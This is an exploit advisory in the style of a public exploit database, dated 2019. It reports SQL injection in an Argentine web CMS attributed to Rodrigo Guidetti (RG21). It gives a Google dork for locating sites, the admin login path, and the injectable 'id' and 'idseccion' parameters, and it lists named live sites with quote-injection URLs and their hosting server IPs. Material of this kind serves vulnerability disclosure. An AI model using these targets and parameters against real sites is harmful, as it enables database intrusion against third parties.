Desarrollado por Rodrigo Guidetti RG21 Argentina SQL Inj

1. ####################################################################
2.  
3. # Exploit Title : Desarrollado por Rodrigo Guidetti RG21 Argentina SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 16/01/2019
7. # Vendor Homepage : rg21.com.ar/rodrigoguidetti/index.php
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : Medium
11. # Google Dorks : intext:''Desarrollado por Rodrigo Guidetti''
12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
13. Special Elements used in an SQL Command ('SQL Injection') ]
14.  
15. ####################################################################
16.  
17. # Admin Panel Login Path :
18. *************************
19. /admin/login.php
20.  
21. # SQL Injection Exploit :
22. ***********************
23.  
24. /contenido.php?id=[SQL Injection]
25.  
26. /listaNotas.php?idseccion=[SQL Injection]
27.  
28. ####################################################################
29.  
30. # Example Vulnerable Sites :
31. *************************
32.  
33. [+] vallauno.com.ar/contenido.php?id=944%27 =>
34.  
35. [ Proof of Concept ] => archive.is/szGew
36.  
37. [+] zazpirakbat.com/contenido.php?id=1%27
38.  
39. Note : (167.250.5.32) => There are 357 domains hosted on this server.
40.  
41. Note : (200.58.120.13) => There are 364 domains hosted on this server.
42.  
43. ####################################################################
44.  
45. # SQL Database Error :
46. **********************
47.  
48. Error: You have an error in your SQL syntax; check the manual that
49. corresponds to your MariaDB server version for the
50. right syntax to use near ''944'' ORDER BY id DESC LIMIT 0, 8' at line 2
51.  
52. ####################################################################
53.  
54. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
55.  
56. ####################################################################